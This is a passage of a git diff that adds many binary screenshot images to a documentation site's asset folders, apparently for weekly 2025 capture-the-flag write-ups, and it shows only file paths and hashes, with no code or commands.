b/docs/assets/images/wp/2025/week2/look-carefully_3.png new file mode 100644 index 0000000..835ecc2 Binary files /dev/null and b/docs/assets/images/wp/2025/week2/look-carefully_3.png differ diff --git a/docs/assets/images/wp/2025/week2/look-carefully_4.png b/docs/assets/images/wp/2025/week2/look-carefully_4.png new file mode 100644 index 0000000..2748840 Binary files /dev/null and b/docs/assets/images/wp/2025/week2/look-carefully_4.png differ diff --git a/docs/assets/images/wp/2025/week2/no-shell_1.png b/docs/assets/images/wp/2025/week2/no-shell_1.png new file mode 100644 index 0000000..bf2a831 Binary files /dev/null and b/docs/assets/images/wp/2025/week2/no-shell_1.png differ diff --git a/docs/assets/images/wp/2025/week2/no-shell_10.png b/docs/assets/images/wp/2025/week2/no-shell_10.png new file mode 100644 index 0000000..423c137 Binary files /dev/null and b/docs/assets/images/wp/2025/week2/no-shell_10.png differ diff --git a/docs/assets/images/wp/2025/week2/no-shell_2.png b/docs/assets/images/wp/2025/week2/no-shell_2.png new file mode 100644 index 0000000..397fa15 Binary files /dev/null and b/docs/assets/images/wp/2025/week2/no-shell_2.png differ diff --git a/docs/assets/images/wp/2025/week2/no-shell_3.png b/docs/assets/images/wp/2025/week2/no-shell_3.png new file mode 100644 index 0000000..7d3d104 Binary files /dev/null and b/docs/assets/images/wp/2025/week2/no-shell_3.png differ diff --git a/docs/assets/images/wp/2025/week2/no-shell_4.png b/docs/assets/images/wp/2025/week2/no-shell_4.png new file mode 100644 index 0000000..fafe10f Binary files /dev/null and b/docs/assets/images/wp/2025/week2/no-shell_4.png differ diff --git a/docs/assets/images/wp/2025/week2/no-shell_5.png b/docs/assets/images/wp/2025/week2/no-shell_5.png new file mode 100644 index 0000000..8df58dd Binary files /dev/null and b/docs/assets/images/wp/2025/week2/no-shell_5.png differ diff --git a/docs/assets/images/wp/2025/week2/no-shell_6.png b/docs/assets/images/wp/2025/week2/no-shell_6.png new file mode 100644 index 0000000..0ee0373 Binary files /dev/null and b/docs/assets/images/wp/2025/week2/no-shell_6.png differ diff --git a/docs/assets/images/wp/2025/week2/no-shell_7.png b/docs/assets/images/wp/2025/week2/no-shell_7.png new file mode 100644 index 0000000..2b8e899 Binary files /dev/null and b/docs/assets/images/wp/2025/week2/no-shell_7.png differ diff --git a/docs/assets/images/wp/2025/week2/no-shell_8.png b/docs/assets/images/wp/2025/week2/no-shell_8.png new file mode 100644 index 0000000..0d8a716 Binary files /dev/null and b/docs/assets/images/wp/2025/week2/no-shell_8.png differ diff --git a/docs/assets/images/wp/2025/week2/no-shell_9.png b/docs/assets/images/wp/2025/week2/no-shell_9.png new file mode 100644 index 0000000..d67f28f Binary files /dev/null and b/docs/assets/images/wp/2025/week2/no-shell_9.png differ diff --git a/docs/assets/images/wp/2025/week2/ohnativeenc_1.png b/docs/assets/images/wp/2025/week2/ohnativeenc_1.png new file mode 100644 index 0000000..da263df Binary files /dev/null and b/docs/assets/images/wp/2025/week2/ohnativeenc_1.png differ diff --git a/docs/assets/images/wp/2025/week2/ohnativeenc_2.png b/docs/assets/images/wp/2025/week2/ohnativeenc_2.png new file mode 100644 index 0000000..0094077 Binary files /dev/null and b/docs/assets/images/wp/2025/week2/ohnativeenc_2.png differ diff --git a/docs/assets/images/wp/2025/week2/orange-snack_1.png b/docs/assets/images/wp/2025/week2/orange-snack_1.png new file mode 100644 index 0000000..394b29d Binary files /dev/null and b/docs/assets/images/wp/2025/week2/orange-snack_1.png differ diff --git a/docs/assets/images/wp/2025/week2/orange-snack_2.png b/docs/assets/images/wp/2025/week2/orange-snack_2.png new file mode 100644 index 0000000..c1d8f01 Binary files /dev/null and b/docs/assets/images/wp/2025/week2/orange-snack_2.png differ diff --git a/docs/assets/images/wp/2025/week2/orange-snack_3.png b/docs/assets/images/wp/2025/week2/orange-snack_3.png new file mode 100644 index 0000000..5590420 Binary files /dev/null and b/docs/assets/images/wp/2025/week2/orange-snack_3.png differ diff --git a/docs/assets/images/wp/2025/week2/orange-snack_4.png b/docs/assets/images/wp/2025/week2/orange-snack_4.png new file mode 100644 index 0000000..a58b623 Binary files /dev/null and b/docs/assets/images/wp/2025/week2/orange-snack_4.png differ diff --git a/docs/assets/images/wp/2025/week2/orange-snack_5.png b/docs/assets/images/wp/2025/week2/orange-snack_5.png new file mode 100644 index 0000000..ff8f3c7 Binary files /dev/null and b/docs/assets/images/wp/2025/week2/orange-snack_5.png differ diff --git a/docs/assets/images/wp/2025/week2/orange-snack_6.png b/docs/assets/images/wp/2025/week2/orange-snack_6.png new file mode 100644 index 0000000..da1af30 Binary files /dev/null and b/docs/assets/images/wp/2025/week2/orange-snack_6.png differ diff --git a/docs/assets/images/wp/2025/week2/orange-snack_7.png b/docs/assets/images/wp/2025/week2/orange-snack_7.png new file mode 100644 index 0000000..4c8694c Binary files /dev/null and b/docs/assets/images/wp/2025/week2/orange-snack_7.png differ diff --git a/docs/assets/images/wp/2025/week2/osint-threat-intel_1.png b/docs/assets/images/wp/2025/week2/osint-threat-intel_1.png new file mode 100644 index 0000000..8eb88ed Binary files /dev/null and b/docs/assets/images/wp/2025/week2/osint-threat-intel_1.png differ diff --git a/docs/assets/images/wp/2025/week2/osint-threat-intel_2.png b/docs/assets/images/wp/2025/week2/osint-threat-intel_2.png new file mode 100644 index 0000000..002d2bc Binary files /dev/null and b/docs/assets/images/wp/2025/week2/osint-threat-intel_2.png differ diff --git a/docs/assets/images/wp/2025/week2/osint-threat-intel_3.png b/docs/assets/images/wp/2025/week2/osint-threat-intel_3.png new file mode 100644 index 0000000..3b2a790 Binary files /dev/null and b/docs/assets/images/wp/2025/week2/osint-threat-intel_3.png differ diff --git a/docs/assets/images/wp/2025/week2/osint-threat-intel_4.png b/docs/assets/images/wp/2025/week2/osint-threat-intel_4.png new file mode 100644 index 0000000..8b20263 Binary files /dev/null and b/docs/assets/images/wp/2025/week2/osint-threat-intel_4.png differ diff --git a/docs/assets/images/wp/2025/week2/osint-threat-intel_5.png b/docs/assets/images/wp/2025/week2/osint-threat-intel_5.png new file mode 100644 index 0000000..aaddf74 Binary files /dev/null and b/docs/assets/images/wp/2025/week2/osint-threat-intel_5.png differ diff --git a/docs/assets/images/wp/2025/week2/osint-threat-intel_6.png b/docs/assets/images/wp/2025/week2/osint-threat-intel_6.png new file mode 100644 index 0000000..3ace8c9 Binary files /dev/null and b/docs/assets/images/wp/2025/week2/osint-threat-intel_6.png differ diff --git a/docs/assets/images/wp/2025/week2/osint-threat-intel_7.png b/docs/assets/images/wp/2025/week2/osint-threat-intel_7.png new file mode 100644 index 0000000..71128ef Binary files /dev/null and b/docs/assets/images/wp/2025/week2/osint-threat-intel_7.png differ diff --git a/docs/assets/images/wp/2025/week2/osint-threat-intel_8.png b/docs/assets/images/wp/2025/week2/osint-threat-intel_8.png new file mode 100644 index 0000000..0dbbdc8 Binary files /dev/null and b/docs/assets/images/wp/2025/week2/osint-threat-intel_8.png differ diff --git a/docs/assets/images/wp/2025/week2/real-checkin_1.png b/docs/assets/images/wp/2025/week2/real-checkin_1.png new file mode 100644 index 0000000..c3ba99b Binary files /dev/null and b/docs/assets/images/wp/2025/week2/real-checkin_1.png differ diff --git a/docs/assets/images/wp/2025/week2/stack-secret_1.png b/docs/assets/images/wp/2025/week2/stack-secret_1.png new file mode 100644 index 0000000..54fb328 Binary files /dev/null and b/docs/assets/images/wp/2025/week2/stack-secret_1.png differ diff --git a/docs/assets/images/wp/2025/week2/stack-secret_2.png b/docs/assets/images/wp/2025/week2/stack-secret_2.png new file mode 100644 index 0000000..91fe1ce Binary files /dev/null and b/docs/assets/images/wp/2025/week2/stack-secret_2.png differ diff --git a/docs/assets/images/wp/2025/week2/thursday_1.png b/docs/assets/images/wp/2025/week2/thursday_1.png new file mode 100644 index 0000000..5d7ea0c Binary files /dev/null and b/docs/assets/images/wp/2025/week2/thursday_1.png differ diff --git a/docs/assets/images/wp/2025/week2/thursday_2.png b/docs/assets/images/wp/2025/week2/thursday_2.png new file mode 100644 index 0000000..7019116 Binary files /dev/null and b/docs/assets/images/wp/2025/week2/thursday_2.png differ diff --git a/docs/assets/images/wp/2025/week2/white-k-1_1.png b/docs/assets/images/wp/2025/week2/white-k-1_1.png new file mode 100644 index 0000000..25aacbc Binary files /dev/null and b/docs/assets/images/wp/2025/week2/white-k-1_1.png differ diff --git a/docs/assets/images/wp/2025/week2/white-k-1_2.png b/docs/assets/images/wp/2025/week2/white-k-1_2.png new file mode 100644 index 0000000..0fc2a8c Binary files /dev/null and b/docs/assets/images/wp/2025/week2/white-k-1_2.png differ diff --git a/docs/assets/images/wp/2025/week2/white-k-1_3.png b/docs/assets/images/wp/2025/week2/white-k-1_3.png new file mode 100644 index 0000000..1528511 Binary files /dev/null and b/docs/assets/images/wp/2025/week2/white-k-1_3.png differ diff --git a/docs/assets/images/wp/2025/week2/white-k-1_4.png b/docs/assets/images/wp/2025/week2/white-k-1_4.png new file mode 100644 index 0000000..1157cad Binary files /dev/null and b/docs/assets/images/wp/2025/week2/white-k-1_4.png differ diff --git a/docs/assets/images/wp/2025/week2/white-k-1_5.png b/docs/assets/images/wp/2025/week2/white-k-1_5.png new file mode 100644 index 0000000..a2943ce Binary files /dev/null and b/docs/assets/images/wp/2025/week2/white-k-1_5.png differ diff --git a/docs/assets/images/wp/2025/week3/e-secret-plan_1.png b/docs/assets/images/wp/2025/week3/e-secret-plan_1.png new file mode 100644 index 0000000..c87015e Binary files /dev/null and b/docs/assets/images/wp/2025/week3/e-secret-plan_1.png differ diff --git a/docs/assets/images/wp/2025/week3/e-secret-plan_2.png b/docs/assets/images/wp/2025/week3/e-secret-plan_2.png new file mode 100644 index 0000000..484a6cd Binary files /dev/null and b/docs/assets/images/wp/2025/week3/e-secret-plan_2.png differ diff --git a/docs/assets/images/wp/2025/week3/ethereum-promise_1.png b/docs/assets/images/wp/2025/week3/ethereum-promise_1.png new file mode 100644 index 0000000..49f2124 Binary files /dev/null and b/docs/assets/images/wp/2025/week3/ethereum-promise_1.png differ diff --git a/docs/assets/images/wp/2025/week3/ethereum-promise_2.jpg b/docs/assets/images/wp/2025/week3/ethereum-promise_2.jpg new file mode 100644 index 0000000..18811c6 Binary files /dev/null and b/docs/assets/images/wp/2025/week3/ethereum-promise_2.jpg differ diff --git a/docs/assets/images/wp/2025/week3/ethereum-promise_3.jpg b/docs/assets/images/wp/2025/week3/ethereum-promise_3.jpg new file mode 100644 index 0000000..387e1c3 Binary files /dev/null and b/docs/assets/images/wp/2025/week3/ethereum-promise_3.jpg differ diff --git a/docs/assets/images/wp/2025/week3/ethereum-promise_4.jpg b/docs/assets/images/wp/2025/week3/ethereum-promise_4.jpg new file mode 100644 index 0000000..b621a8d Binary files /dev/null and b/docs/assets/images/wp/2025/week3/ethereum-promise_4.jpg differ diff --git a/docs/assets/images/wp/2025/week3/ethereum-promise_5.jpg b/docs/assets/images/wp/2025/week3/ethereum-promise_5.jpg new file mode 100644 index 0000000..0df812b Binary files /dev/null and b/docs/assets/images/wp/2025/week3/ethereum-promise_5.jpg differ diff --git a/docs/assets/images/wp/2025/week3/fmt-canary_1.png b/docs/assets/images/wp/2025/week3/fmt-canary_1.png new file mode 100644 index 0000000..8f801d3 Binary files /dev/null and b/docs/assets/images/wp/2025/week3/fmt-canary_1.png differ diff --git a/docs/assets/images/wp/2025/week3/fmt-canary_2.png b/docs/assets/images/wp/2025/week3/fmt-canary_2.png new file mode 100644 index 0000000..eb54dcb Binary files /dev/null and b/docs/assets/images/wp/2025/week3/fmt-canary_2.png differ diff --git a/docs/assets/images/wp/2025/week3/fmt-canary_3.png b/docs/assets/images/wp/2025/week3/fmt-canary_3.png new file mode 100644 index 0000000..62e2c65 Binary files /dev/null and b/docs/assets/images/wp/2025/week3/fmt-canary_3.png differ diff --git a/docs/assets/images/wp/2025/week3/fmt-canary_4.png b/docs/assets/images/wp/2025/week3/fmt-canary_4.png new file mode 100644 index 0000000..57d2fd1 Binary files /dev/null and b/docs/assets/images/wp/2025/week3/fmt-canary_4.png differ diff --git a/docs/assets/images/wp/2025/week3/fmt-canary_5.png b/docs/assets/images/wp/2025/week3/fmt-canary_5.png new file mode 100644 index 0000000..02aef8f Binary files /dev/null and b/docs/assets/images/wp/2025/week3/fmt-canary_5.png differ diff --git a/docs/assets/images/wp/2025/week3/fmt-canary_6.png b/docs/assets/images/wp/2025/week3/fmt-canary_6.png new file mode 100644 index 0000000..4c04529 Binary files /dev/null and b/docs/assets/images/wp/2025/week3/fmt-canary_6.png differ diff --git a/docs/assets/images/wp/2025/week3/log-blind-dolphin_1.png b/docs/assets/images/wp/2025/week3/log-blind-dolphin_1.png new file mode 100644 index 0000000..945115d Binary files /dev/null and b/docs/assets/images/wp/2025/week3/log-blind-dolphin_1.png differ diff --git a/docs/assets/images/wp/2025/week3/log-blind-dolphin_2.png b/docs/assets/images/wp/2025/week3/log-blind-dolphin_2.png new file mode 100644 index 0000000..7b20cdd Binary files /dev/null and b/docs/assets/images/wp/2025/week3/log-blind-dolphin_2.png differ diff --git a/docs/assets/images/wp/2025/week3/mem-forensics-win_1.png b/docs/assets/images/wp/2025/week3/mem-forensics-win_1.png new file mode 100644 index 0000000..20af029 Binary files /dev/null and b/docs/assets/images/wp/2025/week3/mem-forensics-win_1.png differ diff --git a/docs/assets/images/wp/2025/week3/mem-forensics-win_2.png b/docs/assets/images/wp/2025/week3/mem-forensics-win_2.png new file mode 100644 index 0000000..4b7ccec Binary files /dev/null and b/docs/assets/images/wp/2025/week3/mem-forensics-win_2.png differ diff --git a/docs/assets/images/wp/2025/week3/mem-forensics-win_3.png b/docs/assets/images/wp/2025/week3/mem-forensics-win_3.png new file mode 100644 index 0000000..6775cbe Binary files /dev/null and b/docs/assets/images/wp/2025/week3/mem-forensics-win_3.png differ diff --git a/docs/assets/images/wp/2025/week3/mem-forensics-win_4.png b/docs/assets/images/wp/2025/week3/mem-forensics-win_4.png new file mode 100644 index 0000000..1583bed Binary files /dev/null and b/docs/assets/images/wp/2025/week3/mem-forensics-win_4.png differ diff --git a/docs/assets/images/wp/2025/week3/mem-forensics-win_5.png b/docs/assets/images/wp/2025/week3/mem-forensics-win_5.png new file mode 100644 index 0000000..fb71786 Binary files /dev/null and b/docs/assets/images/wp/2025/week3/mem-forensics-win_5.png differ diff --git a/docs/assets/images/wp/2025/week3/mem-forensics-win_6.png b/docs/assets/images/wp/2025/week3/mem-forensics-win_6.png new file mode 100644 index 0000000..a7ff590 Binary files /dev/null and b/docs/assets/images/wp/2025/week3/mem-forensics-win_6.png differ diff --git a/docs/assets/images/wp/2025/week3/mygo_1.png b/docs/assets/images/wp/2025/week3/mygo_1.png new file mode 100644 index 0000000..e8ede2d Binary files /dev/null and b/docs/assets/images/wp/2025/week3/mygo_1.png differ diff --git a/docs/assets/images/wp/2025/week3/mygo_2.png b/docs/assets/images/wp/2025/week3/mygo_2.png new file mode 100644 index 0000000..c437c5e Binary files /dev/null and b/docs/assets/images/wp/2025/week3/mygo_2.png differ diff --git a/docs/assets/images/wp/2025/week3/pyz3_1.png b/docs/assets/images/wp/2025/week3/pyz3_1.png new file mode 100644 index 0000000..fd08e64 Binary files /dev/null and b/docs/assets/images/wp/2025/week3/pyz3_1.png differ diff --git a/docs/assets/images/wp/2025/week3/sandbox-plus_1.jpg b/docs/assets/images/wp/2025/week3/sandbox-plus_1.jpg new file mode 100644 index 0000000..94939d9 Binary files /dev/null and b/docs/assets/images/wp/2025/week3/sandbox-plus_1.jpg differ diff --git a/docs/assets/images/wp/2025/week3/sandbox-plus_2.jpg b/docs/assets/images/wp/2025/week3/sandbox-plus_2.jpg new file mode 100644 index 0000000..ed562d7 Binary files /dev/null and b/docs/assets/images/wp/2025/week3/sandbox-plus_2.jpg differ diff --git a/docs/assets/images/wp/2025/week3/sandbox-plus_3.jpg b/docs/assets/images/wp/2025/week3/sandbox-plus_3.jpg new file mode 100644 index 0000000..6f9311b Binary files /dev/null and b/docs/assets/images/wp/2025/week3/sandbox-plus_3.jpg differ diff --git a/docs/assets/images/wp/2025/week3/traffic-s7-secret_1.png b/docs/assets/images/wp/2025/week3/traffic-s7-secret_1.png new file mode 100644 index 0000000..7237c60 Binary files /dev/null and b/docs/assets/images/wp/2025/week3/traffic-s7-secret_1.png differ diff --git a/docs/assets/images/wp/2025/week3/traffic-s7-secret_2.png b/docs/assets/images/wp/2025/week3/traffic-s7-secret_2.png new file mode 100644 index 0000000..933883c Binary files /dev/null and b/docs/assets/images/wp/2025/week3/traffic-s7-secret_2.png differ diff --git a/docs/assets/images/wp/2025/week3/traffic-s7-secret_3.png b/docs/assets/images/wp/2025/week3/traffic-s7-secret_3.png new file mode 100644 index 0000000..584bbd1 Binary files /dev/null and b/docs/assets/images/wp/2025/week3/traffic-s7-secret_3.png differ diff --git a/docs/assets/images/wp/2025/week3/traffic-s7-secret_4.png b/docs/assets/images/wp/2025/week3/traffic-s7-secret_4.png new file mode 100644 index 0000000..8fdcbaa Binary files /dev/null and b/docs/assets/images/wp/2025/week3/traffic-s7-secret_4.png differ diff --git a/docs/assets/images/wp/2025/week3/traffic-s7-secret_5.png b/docs/assets/images/wp/2025/week3/traffic-s7-secret_5.png new file mode 100644 index 0000000..b6f19a7 Binary files /dev/null and b/docs/assets/images/wp/2025/week3/traffic-s7-secret_5.png differ diff --git a/docs/assets/images/wp/2025/week4/chaotic-site_1.png b/docs/assets/images/wp/2025/week4/chaotic-site_1.png new file mode 100644 index 0000000..239da4a Binary files /dev/null and b/docs/assets/images/wp/2025/week4/chaotic-site_1.png differ diff --git a/docs/assets/images/wp/2025/week4/chaotic-site_2.png b/docs/assets/images/wp/2025/week4/chaotic-site_2.png new file mode 100644 index 0000000..d90c165 Binary files /dev/null and b/docs/assets/images/wp/2025/week4/chaotic-site_2.png differ diff --git a/docs/assets/images/wp/2025/week4/chaotic-site_3.png b/docs/assets/images/wp/2025/week4/chaotic-site_3.png new file mode 100644 index 0000000..eca5f85 Binary files /dev/null and b/docs/assets/images/wp/2025/week4/chaotic-site_3.png differ diff --git a/docs/assets/images/wp/2025/week4/chaotic-site_4.png b/docs/assets/images/wp/2025/week4/chaotic-site_4.png new file mode 100644 index 0000000..fe5aa0b Binary files /dev/null and b/docs/assets/images/wp/2025/week4/chaotic-site_4.png differ diff --git a/docs/assets/images/wp/2025/week4/chaotic-site_5.png b/docs/assets/images/wp/2025/week4/chaotic-site_5.png new file mode 100644 index 0000000..0b18e64 Binary files /dev/null and b/docs/assets/images/wp/2025/week4/chaotic-site_5.png differ diff --git a/docs/assets/images/wp/2025/week4/content_1.png b/docs/assets/images/wp/2025/week4/content_1.png new file mode 100644 index 0000000..6ac89aa Binary files /dev/null and b/docs/assets/images/wp/2025/week4/content_1.png differ diff --git a/docs/assets/images/wp/2025/week4/content_2.png b/docs/assets/images/wp/2025/week4/content_2.png new file mode 100644 index 0000000..1ee0d7c Binary files /dev/null and b/docs/assets/images/wp/2025/week4/content_2.png differ diff --git a/docs/assets/images/wp/2025/week4/content_3.png b/docs/assets/images/wp/2025/week4/content_3.png new file mode 100644 index 0000000..5cb764f Binary files /dev/null and b/docs/assets/images/wp/2025/week4/content_3.png differ diff --git a/docs/assets/images/wp/2025/week4/content_4.png b/docs/assets/images/wp/2025/week4/content_4.png new file mode 100644 index 0000000..1325e52 Binary files /dev/null and b/docs/assets/images/wp/2025/week4/content_4.png differ diff --git a/docs/assets/images/wp/2025/week4/content_5.png b/docs/assets/images/wp/2025/week4/content_5.png new file mode 100644 index 0000000..fa76e10 Binary files /dev/null and b/docs/assets/images/wp/2025/week4/content_5.png differ diff --git a/docs/assets/images/wp/2025/week4/content_6.png b/docs/assets/images/wp/2025/week4/content_6.png new file mode 100644 index 0000000..511c8ba Binary files /dev/null and b/docs/assets/images/wp/2025/week4/content_6.png differ diff --git a/docs/assets/images/wp/2025/week4/ezrust_1.png b/docs/assets/images/wp/2025/week4/ezrust_1.png new file mode 100644 index 0000000..abfb219 Binary files /dev/null and b/docs/assets/images/wp/2025/week4/ezrust_1.png differ diff --git a/docs/assets/images/wp/2025/week4/ezrust_2.png b/docs/assets/images/wp/2025/week4/ezrust_2.png new file mode 100644 index 0000000..b4cfb6b Binary files /dev/null and b/docs/assets/images/wp/2025/week4/ezrust_2.png differ diff --git a/docs/assets/images/wp/2025/week4/ezrust_3.png b/docs/assets/images/wp/2025/week4/ezrust_3.png new file mode 100644 index 0000000..0353cdd Binary files /dev/null and b/docs/assets/images/wp/2025/week4/ezrust_3.png differ diff --git a/docs/assets/images/wp/2025/week4/fmt-got_1.png b/docs/assets/images/wp/2025/week4/fmt-got_1.png new file mode 100644 index 0000000..0a12d19 Binary files /dev/null and b/docs/assets/images/wp/2025/week4/fmt-got_1.png differ diff --git a/docs/assets/images/wp/2025/week4/fmt-got_2.png b/docs/assets/images/wp/2025/week4/fmt-got_2.png new file mode 100644 index 0000000..933a485 Binary files /dev/null and b/docs/assets/images/wp/2025/week4/fmt-got_2.png differ diff --git a/docs/assets/images/wp/2025/week4/fmt-got_3.png b/docs/assets/images/wp/2025/week4/fmt-got_3.png new file mode 100644 index 0000000..ba691ac Binary files /dev/null and b/docs/assets/images/wp/2025/week4/fmt-got_3.png differ diff --git a/docs/assets/images/wp/2025/week4/ir-intro_1.png b/docs/assets/images/wp/2025/week4/ir-intro_1.png new file mode 100644 index 0000000..4020d2b Binary files /dev/null and b/docs/assets/images/wp/2025/week4/ir-intro_1.png differ diff --git a/docs/assets/images/wp/2025/week4/ir-intro_2.png b/docs/assets/images/wp/2025/week4/ir-intro_2.png new file mode 100644 index 0000000..632f991 Binary files /dev/null and b/docs/assets/images/wp/2025/week4/ir-intro_2.png differ diff --git a/docs/assets/images/wp/2025/week4/ir-intro_3.png b/docs/assets/images/wp/2025/week4/ir-intro_3.png new file mode 100644 index 0000000..9b41389 Binary files /dev/null and b/docs/assets/images/wp/2025/week4/ir-intro_3.png differ diff --git a/docs/assets/images/wp/2025/week4/ir-intro_4.png b/docs/assets/images/wp/2025/week4/ir-intro_4.png new file mode 100644 index 0000000..7593793 Binary files /dev/null and b/docs/assets/images/wp/2025/week4/ir-intro_4.png differ diff --git a/docs/assets/images/wp/2025/week4/ir-intro_5.png b/docs/assets/images/wp/2025/week4/ir-intro_5.png new file mode 100644 index 0000000..b7415f2 Binary files /dev/null and b/docs/assets/images/wp/2025/week4/ir-intro_5.png differ diff --git a/docs/assets/images/wp/2025/week4/ir-intro_6.png b/docs/assets/images/wp/2025/week4/ir-intro_6.png new file mode 100644 index 0000000..3a68f3a Binary files /dev/null and b/docs/assets/images/wp/2025/week4/ir-intro_6.png differ diff --git a/docs/assets/images/wp/2025/week4/ir-intro_7.png b/docs/assets/images/wp/2025/week4/ir-intro_7.png new file mode 100644 index 0000000..d6cef93 Binary files /dev/null and b/docs/assets/images/wp/2025/week4/ir-intro_7.png differ diff --git a/docs/assets/images/wp/2025/week4/ir-intro_8.png b/docs/assets/images/wp/2025/week4/ir-intro_8.png new file mode 100644 index 0000000..ab8b4a9 Binary files /dev/null and b/docs/assets/images/wp/2025/week4/ir-intro_8.png differ diff --git a/docs/assets/images/wp/2025/week4/ir-intro_9.png b/docs/assets/images/wp/2025/week4/ir-intro_9.png new file mode 100644 index 0000000..e7422a2 Binary files /dev/null and b/docs/assets/images/wp/2025/week4/ir-intro_9.png differ diff --git a/docs/assets/images/wp/2025/week4/kungfu-manual_1.png b/docs/assets/images/wp/2025/week4/kungfu-manual_1.png new file mode 100644 index 0000000..cab2012 Binary files /dev/null and b/docs/assets/images/wp/2025/week4/kungfu-manual_1.png differ diff --git a/docs/assets/images/wp/2025/week4/kungfu-manual_10.png b/docs/assets/images/wp/2025/week4/kungfu-manual_10.png new file mode 100644 index 0000000..5d3bd86 Binary files /dev/null and b/docs/assets/images/wp/2025/week4/kungfu-manual_10.png differ diff --git a/docs/assets/images/wp/2025/week4/kungfu-manual_11.png b/docs/assets/images/wp/2025/week4/kungfu-manual_11.png new file mode 100644 index 0000000..bdaebde Binary files /dev/null and b/docs/assets/images/wp/2025/week4/kungfu-manual_11.png differ diff --git a/docs/assets/images/wp/2025/week4/kungfu-manual_12.png b/docs/assets/images/wp/2025/week4/kungfu-manual_12.png new file mode 100644 index 0000000..6ff33a1 Binary files /dev/null and b/docs/assets/images/wp/2025/week4/kungfu-manual_12.png differ diff --git a/docs/assets/images/wp/2025/week4/kungfu-manual_13.png b/docs/assets/images/wp/2025/week4/kungfu-manual_13.png new file mode 100644 index 0000000..140e0a0 Binary files /dev/null and b/docs/assets/images/wp/2025/week4/kungfu-manual_13.png differ diff --git a/docs/assets/images/wp/2025/week4/kungfu-manual_2.png b/docs/assets/images/wp/2025/week4/kungfu-manual_2.png new file mode 100644 index 0000000..bc09809 Binary files /dev/null and b/docs/assets/images/wp/2025/week4/kungfu-manual_2.png differ diff --git a/docs/assets/images/wp/2025/week4/kungfu-manual_3.png b/docs/assets/images/wp/2025/week4/kungfu-manual_3.png new file mode 100644 index 0000000..82607cb Binary files /dev/null and b/docs/assets/images/wp/2025/week4/kungfu-manual_3.png differ diff --git a/docs/assets/images/wp/2025/week4/kungfu-manual_4.png b/docs/assets/images/wp/2025/week4/kungfu-manual_4.png new file mode 100644 index 0000000..ef9e7f5 Binary files /dev/null and b/docs/assets/images/wp/2025/week4/kungfu-manual_4.png differ diff --git a/docs/assets/images/wp/2025/week4/kungfu-manual_5.png b/docs/assets/images/wp/2025/week4/kungfu-manual_5.png new file mode 100644 index 0000000..f170d9c Binary files /dev/null and b/docs/assets/images/wp/2025/week4/kungfu-manual_5.png differ diff --git a/docs/assets/images/wp/2025/week4/kungfu-manual_6.png b/docs/assets/images/wp/2025/week4/kungfu-manual_6.png new file mode 100644 index 0000000..8ecb54f Binary files /dev/null and b/docs/assets/images/wp/2025/week4/kungfu-manual_6.png differ diff --git a/docs/assets/images/wp/2025/week4/kungfu-manual_7.png b/docs/assets/images/wp/2025/week4/kungfu-manual_7.png new file mode 100644 index 0000000..ba2a66a Binary files /dev/null and b/docs/assets/images/wp/2025/week4/kungfu-manual_7.png differ diff --git a/docs/assets/images/wp/2025/week4/kungfu-manual_8.png b/docs/assets/images/wp/2025/week4/kungfu-manual_8.png new file mode 100644 index 0000000..b556cc2 Binary files /dev/null and b/docs/assets/images/wp/2025/week4/kungfu-manual_8.png differ diff --git a/docs/assets/images/wp/2025/week4/kungfu-manual_9.png b/docs/assets/images/wp/2025/week4/kungfu-manual_9.png new file mode 100644 index 0000000..4f82d57 Binary files /dev/null and b/docs/assets/images/wp/2025/week4/kungfu-manual_9.png differ diff --git a/docs/assets/images/wp/2025/week4/lamb-maze_1.png b/docs/assets/images/wp/2025/week4/lamb-maze_1.png new file mode 100644 index 0000000..189c176 Binary files /dev/null and b/docs/assets/images/wp/2025/week4/lamb-maze_1.png differ diff --git a/docs/assets/images/wp/2025/week4/lamb-maze_2.png b/docs/assets/images/wp/2025/week4/lamb-maze_2.png new file mode 100644 index 0000000..8435819 Binary files /dev/null and b/docs/assets/images/wp/2025/week4/lamb-maze_2.png differ diff --git a/docs/assets/images/wp/2025/week4/lamb-maze_3.png b/docs/assets/images/wp/2025/week4/lamb-maze_3.png new file mode 100644 index 0000000..91deb1c Binary files /dev/null and b/docs/assets/images/wp/2025/week4/lamb-maze_3.png differ diff --git a/docs/assets/images/wp/2025/week4/lamb-maze_4.png b/docs/assets/images/wp/2025/week4/lamb-maze_4.png new file mode 100644 index 0000000..0d94585 Binary files /dev/null and b/docs/assets/images/wp/2025/week4/lamb-maze_4.png differ diff --git a/docs/assets/images/wp/2025/week4/lamb-maze_5.png b/docs/assets/images/wp/2025/week4/lamb-maze_5.png new file mode 100644 index 0000000..9b038bc Binary files /dev/null and b/docs/assets/images/wp/2025/week4/lamb-maze_5.png differ diff --git a/docs/assets/images/wp/2025/week4/lamb-maze_6.png b/docs/assets/images/wp/2025/week4/lamb-maze_6.png new file mode 100644 index 0000000..9c33809 Binary files /dev/null and b/docs/assets/images/wp/2025/week4/lamb-maze_6.png differ diff --git a/docs/assets/images/wp/2025/week4/memory_1.jpg b/docs/assets/images/wp/2025/week4/memory_1.jpg new file mode 100644 index 0000000..f3cd490 Binary files /dev/null and b/docs/assets/images/wp/2025/week4/memory_1.jpg differ diff --git a/docs/assets/images/wp/2025/week4/memory_2.jpg b/docs/assets/images/wp/2025/week4/memory_2.jpg new file mode 100644 index 0000000..b6617fe Binary files /dev/null and b/docs/assets/images/wp/2025/week4/memory_2.jpg differ diff --git a/docs/assets/images/wp/2025/week4/memory_3.png b/docs/assets/images/wp/2025/week4/memory_3.png new file mode 100644 index 0000000..9985ff3 Binary files /dev/null and b/docs/assets/images/wp/2025/week4/memory_3.png differ diff --git a/docs/assets/images/wp/2025/week4/memory_4.jpg b/docs/assets/images/wp/2025/week4/memory_4.jpg new file mode 100644 index 0000000..fc452e2 Binary files /dev/null and b/docs/assets/images/wp/2025/week4/memory_4.jpg differ diff --git a/docs/assets/images/wp/2025/week4/memory_5.jpg b/docs/assets/images/wp/2025/week4/memory_5.jpg new file mode 100644 index 0000000..7b67f30 Binary files /dev/null and b/docs/assets/images/wp/2025/week4/memory_5.jpg differ diff --git a/docs/assets/images/wp/2025/week4/smart-contracts_1.png b/docs/assets/images/wp/2025/week4/smart-contracts_1.png new file mode 100644 index 0000000..0ec3402 Binary files /dev/null and b/docs/assets/images/wp/2025/week4/smart-contracts_1.png differ diff --git a/docs/assets/images/wp/2025/week4/smart-contracts_2.png b/docs/assets/images/wp/2025/week4/smart-contracts_2.png new file mode 100644 index 0000000..7b86af8 Binary files /dev/null and b/docs/assets/images/wp/2025/week4/smart-contracts_2.png differ diff --git a/docs/assets/images/wp/2025/week4/smart-contracts_3.png 